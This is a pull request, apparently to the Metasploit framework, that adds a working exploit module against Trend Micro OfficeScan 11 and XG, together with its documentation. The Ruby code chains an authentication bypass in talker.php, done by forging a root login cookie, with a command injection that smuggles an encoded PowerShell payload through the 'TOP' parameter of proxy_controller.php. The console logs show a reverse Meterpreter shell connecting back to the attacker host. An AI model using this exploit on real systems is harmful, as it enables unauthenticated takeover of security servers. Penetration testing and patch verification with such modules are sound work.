### PR TITLE
Adding Trend Micro OfficeScan Widget RCE module

### DIFF
--- a/documentation/modules/exploit/windows/http/trend_micro_officescan_widget_exec.md
+++ b/documentation/modules/exploit/windows/http/trend_micro_officescan_widget_exec.md
@@ -1,0 +1,61 @@
+## Vulnerable Application
+
+This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.
+
+Trend Micro Officescan product have widget feature which is implemented with PHP. Talker.php takes ack and hash parameter but don't validate these values, which leads to an authentication bypass for widget. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.
+
+**Vulnerable Application Installation Steps**
+
+1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
+2. Find "OfficeScan" and click.
+3. At the time of writing this documentation, you must see "osce-xg-win-en-gm-b1315.exe" next to Download button.
+4. Click to the download button and complete installation of ISO.
+5. Install the downloaded file on Windows operating system. (Tested with Windows 7)
+
+If you don't see an affected version of OfficeScan, you can try to download it directly from following URL.
+
+[ftp://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe](ftp://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe)
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/windows/http/trendmicro_officescan_exec`
+- [ ] Set `RHOST`
+- [ ] Set `LHOST`
+- [ ] Run `check`
+- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
+- [ ] Run `exploit`
+- [ ] **Verify** that you are seeing `PHPSESSIONID` value.
+- [ ] **Verify** that you are getting `meterpreter` session.
+
+## Scenarios
+
+```
+msf > use exploit/windows/http/trendmicro_officescan_exec
+msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.184
+RHOST => 12.0.0.184
+msf exploit(trendmicro_officescan_exec) > check
+[*] 12.0.0.184:443 The target appears to be vulnerable.
+msf exploit(trendmicro_officescan_exec) > exploit 
+
+[*] Started reverse TCP handler on 12.0.0.1:4444 
+[*] Exploiting authentication bypass
+[+] Awesome. PHPSESSID=qkbkkkb281fn4019e02g80i156;
+[*] Generating payload
+[*] Trigerring command injection vulnerability
+[*] Sending stage (179267 bytes) to 12.0.0.184
+[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.184:50582) at 2017-10-08 10:13:27 +0300
+
+meterpreter > sysinfo
+Computer        : CME
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : tr_TR
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > 
+
+```

--- a/documentation/modules/exploit/windows/http/trend_micro_officescan_widget_exec.md
+++ b/documentation/modules/exploit/windows/http/trend_micro_officescan_widget_exec.md
@@ -2,7 +2,7 @@
 
 This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.
 
-Trend Micro Officescan product have widget feature which is implemented with PHP. Talker.php takes ack and hash parameter but don't validate these values, which leads to an authentication bypass for widget. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.
+The Trend Micro OfficeScan product has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.
 
 **Vulnerable Application Installation Steps**
 
@@ -14,39 +14,36 @@ Trend Micro Officescan product have widget feature which is implemented with PHP
 
 If you don't see an affected version of OfficeScan, you can try to download it directly from following URL.
 
-[ftp://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe](ftp://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe)
+[http://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe](http://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe)
 
 ## Verification Steps
 
 A successful check of the exploit will look like this:
 
 - [ ] Start `msfconsole`
-- [ ] `use exploit/windows/http/trendmicro_officescan_exec`
+- [ ] `use exploit/windows/http/trendmicro_officescan_widget_exec`
 - [ ] Set `RHOST`
 - [ ] Set `LHOST`
 - [ ] Run `check`
-- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
+- [ ] **Verify** that you are seeing `The target is vulnerable.`
 - [ ] Run `exploit`
-- [ ] **Verify** that you are seeing `PHPSESSIONID` value.
+- [ ] **Verify** that you are seeing `Authenticated successfully bypassed` value.
 - [ ] **Verify** that you are getting `meterpreter` session.
 
 ## Scenarios
 
 ```
-msf > use exploit/windows/http/trendmicro_officescan_exec
-msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.184
-RHOST => 12.0.0.184
-msf exploit(trendmicro_officescan_exec) > check
-[*] 12.0.0.184:443 The target appears to be vulnerable.
-msf exploit(trendmicro_officescan_exec) > exploit 
+msf exploit(trendmicro_officescan_widget_exec) > exploit 
 
 [*] Started reverse TCP handler on 12.0.0.1:4444 
+[*] Auto detection enabled. Trying to detect target system version.
+[*] Target system selected : OfficeScan 11
 [*] Exploiting authentication bypass
-[+] Awesome. PHPSESSID=qkbkkkb281fn4019e02g80i156;
+[+] Authenticated successfully bypassed.
 [*] Generating payload
 [*] Trigerring command injection vulnerability
-[*] Sending stage (179267 bytes) to 12.0.0.184
-[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.184:50582) at 2017-10-08 10:13:27 +0300
+[*] Sending stage (179267 bytes) to 12.0.0.176
+[*] Meterpreter session 9 opened (12.0.0.1:4444 -> 12.0.0.176:49842) at 2017-10-09 21:57:29 +0300
 
 meterpreter > sysinfo
 Computer        : CME

--- a/modules/exploits/windows/http/trendmicro_officescan_widget_exec.rb
+++ b/modules/exploits/windows/http/trendmicro_officescan_widget_exec.rb
@@ -16,9 +16,9 @@ class MetasploitModule < Msf::Exploit::Remote
         This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
         terminal command under the context of the web server user.
 
-        The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro Officescan product
-        have widget feature which is implemented with PHP. Talker.php takes ack and hash parameter but don't validate these values, which
-        leads to an authentication bypass for widget. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process
+        The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro Officescan product
+        has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which
+        leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process
         does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
         unauthenticated users can execute a terminal command under the context of the web server user.
       },
@@ -40,7 +40,12 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Platform'       => ['win'],
       'Arch'           => [ ARCH_X86, ARCH_X64 ],
-      'Targets'        => [[ 'Automatic', {}]],
+      'Targets'        =>
+        [
+          ['Automatic Targeting', { 'auto' => true }],
+          ['OfficeScan 11', {}],
+          ['OfficeScan XG', {}],
+        ],
       'Privileged'     => false,
       'DisclosureDate' => "Oct 7 2017",
       'DefaultTarget'  => 0
@@ -53,9 +58,57 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def auth
-    # Authentication bypass
-    csrf_token = Rex::Text.md5(Time.now.to_s)
+  def build_csrftoken(my_target, phpsessid=nil)
+    vprint_status("Building csrftoken")
+    if my_target.name == 'OfficeScan XG'
+      csrf_token = Rex::Text.md5(Time.now.to_s)
+    else
+      csrf_token = phpsessid.scan(/PHPSESSID=([a-zA-Z0-9]+)/).flatten[0]
+    end
+    csrf_token
+  end
+
+  def auto_target
+    #XG version of the widget library has package.json within the same directory.
+    mytarget = target
+    if target['auto'] && target.name =~ /Automatic/
+      print_status('Automatic targeting enabled. Trying to detect version.')
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'package.json'),
+      })
+
+      if res && res.code == 200
+        mytarget = targets[2]
+      elsif res && res.code == 404
+        mytarget = targets[1]
+      else
+        fail_with(Failure::Unknown, 'Unable to automatically select a target')
+      end
+      print_status("Selected target system : #{mytarget.name}")
+    end
+    mytarget
+  end
+
+  def auth(my_target)
+    # Version XG performs MD5 validation on wf_CSRF_token parameter. We can't simply use PHPSESSID directly because it contains a-zA-Z0-9.
+    # Beside that, version 11 use PHPSESSID value as a csrf token. Thus, we are manually crafting the cookie.
+    if my_target.name == 'OfficeScan XG'
+      csrf_token = build_csrftoken(my_target)
+      cookie = "LANG=en_US; LogonUser=root; userID=1; wf_CSRF_token=#{csrf_token}"
+    # Version 11 want to see valid PHPSESSID from beginning to the end. For this reason we need to force backend to initiate one for us.
+    else
+      vprint_status("Sending session initiation request for : #{my_target.name}.")
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'index.php'),
+      })
+      cookie = "LANG=en_US; LogonUser=root; userID=1; #{res.get_cookies}"
+      csrf_token = build_csrftoken(my_target, res.get_cookies)
+    end
+
+    # Okay, we dynamically generated a cookie and csrf_token values depends on OfficeScan version.
+    # Now we need to exploit authentication bypass vulnerability.
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'ui', 'modLogin', 'talker.php'),
@@ -63,7 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'X-CSRFToken' => csrf_token,
         'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
       },
-      'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}",
+      'cookie' => cookie,
       'vars_post' => {
         'cid' => '1',
         'act' => 'check',
@@ -73,30 +126,61 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res && res.code == 200 && res.body.include?('login successfully')
-      res.get_cookies
+      # Another business logic in here.
+      # Version 11 want to use same PHPSESSID generated at the beginning by hitting index.php
+      # Version XG want to use newly created PHPSESSID that comes from auth bypass response.
+      if my_target.name == 'OfficeScan XG'
+        res.get_cookies
+      else
+        cookie
+      end
     else
        nil
     end
   end
 
   def check
-    # If we've managed to bypass authentication, that means target is most likely vulnerable.
-    token = auth
+    my_target = auto_target
+    token = auth(my_target)
+    # If we dont have a cookie that means authentication bypass issue has been patched on target system.
     if token.nil?
       Exploit::CheckCode::Safe
     else
-      Exploit::CheckCode::Appears
+      # Authentication bypass does not mean that we have a command injection.
+      # Accessing to the widget framework without having command injection means literally nothing.
+      # So we gonna trigger command injection vulnerability without a payload.
+      csrf_token = build_csrftoken(my_target, token)
+      vprint_status('Trying to detect command injection vulnerability')
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'),
+        'headers' => {
+          'X-CSRFToken' => csrf_token,
+          'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
+        },
+        'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{token}",
+        'vars_post' => {
+          'module' => 'modTMCSS',
+          'serverid' => '1',
+          'TOP' => ''
+        }
+      })
+      if res && res.code == 200 && res.body.include?('Proxy execution failed: exec report.php failed')
+        Exploit::CheckCode::Vulnerable
+      else
+        Exploit::CheckCode::Safe
+      end
     end
   end
 
   def exploit
+    mytarget = auto_target
     print_status('Exploiting authentication bypass')
-
-    cookie = auth
+    cookie = auth(mytarget)
     if cookie.nil?
       fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
     else
-      print_good("Awesome. #{cookie}")
+      print_good("Authenticated successfully bypassed.")
     end
 
     print_status('Generating payload')
@@ -107,10 +191,13 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
 
+
+    # We need to craft csrf value for version 11 again like we did before at auth function.
+    csrf_token = build_csrftoken(mytarget, cookie)
+
     print_status('Trigerring command injection vulnerability')
 
-    csrf_token = Rex::Text.md5(Time.now.to_s)
-    res = send_request_cgi({
+    send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'),
       'headers' => {

--- a/modules/exploits/windows/http/trendmicro_officescan_widget_exec.rb
+++ b/modules/exploits/windows/http/trendmicro_officescan_widget_exec.rb
@@ -1,0 +1,129 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Trend Micro OfficeScan Remote Code Execution",
+      'Description'    => %q{
+        This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
+        terminal command under the context of the web server user.
+
+        The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro Officescan product
+        have widget feature which is implemented with PHP. Talker.php takes ack and hash parameter but don't validate these values, which
+        leads to an authentication bypass for widget. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process
+        does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
+        unauthenticated users can execute a terminal command under the context of the web server user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'mr_me <mr_me@offensive-security.com>', # author of command injection
+          'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
+          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => true,
+          'RPORT' => 443
+        },
+      'Platform'       => ['win'],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        => [[ 'Automatic', {}]],
+      'Privileged'     => false,
+      'DisclosureDate' => "Oct 7 2017",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/'])
+      ]
+    )
+  end
+
+  def auth
+    # Authentication bypass
+    csrf_token = Rex::Text.md5(Time.now.to_s)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'ui', 'modLogin', 'talker.php'),
+      'headers' => {
+        'X-CSRFToken' => csrf_token,
+        'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
+      },
+      'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}",
+      'vars_post' => {
+        'cid' => '1',
+        'act' => 'check',
+        'hash' => Rex::Text.rand_text_alpha(10),
+        'pid' => '1'
+      }
+    })
+
+    if res && res.code == 200 && res.body.include?('login successfully')
+      res.get_cookies
+    else
+       nil
+    end
+  end
+
+  def check
+    # If we've managed to bypass authentication, that means target is most likely vulnerable.
+    token = auth
+    if token.nil?
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Appears
+    end
+  end
+
+  def exploit
+    print_status('Exploiting authentication bypass')
+
+    cookie = auth
+    if cookie.nil?
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    else
+      print_good("Awesome. #{cookie}")
+    end
+
+    print_status('Generating payload')
+
+    powershell_options = {
+      encode_final_payload: true,
+      remove_comspec: true
+    }
+    p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
+
+    print_status('Trigerring command injection vulnerability')
+
+    csrf_token = Rex::Text.md5(Time.now.to_s)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'),
+      'headers' => {
+        'X-CSRFToken' => csrf_token,
+        'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
+      },
+      'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{cookie}",
+      'vars_post' => {
+        'module' => 'modTMCSS',
+        'serverid' => '1',
+        'TOP' => "2>&1||#{p}"
+      }
+    })
+
+  end
+end


### PR DESCRIPTION
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/windows/http/trendmicro_officescan_exec`
- [x] Set `RHOST`
- [x] Set `LHOST`
- [x] Run `check`
- [x] **Verify** that you are seeing `The target appears to be vulnerable.`
- [x] Run `exploit`
- [x] **Verify** that you are seeing `PHPSESSIONID` value.
- [x] **Verify** that you are getting `meterpreter` session.

## Scenarios

```
msf > use exploit/windows/http/trendmicro_officescan_exec
msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.184
RHOST => 12.0.0.184
msf exploit(trendmicro_officescan_exec) > check
[*] 12.0.0.184:443 The target appears to be vulnerable.
msf exploit(trendmicro_officescan_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Exploiting authentication bypass
[+] Awesome. PHPSESSID=qkbkkkb281fn4019e02g80i156;
[*] Generating payload
[*] Trigerring command injection vulnerability
[*] Sending stage (179267 bytes) to 12.0.0.184
[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.184:50582) at 2017-10-08 10:13:27 +0300

meterpreter > sysinfo
Computer        : CME
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : tr_TR
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

```
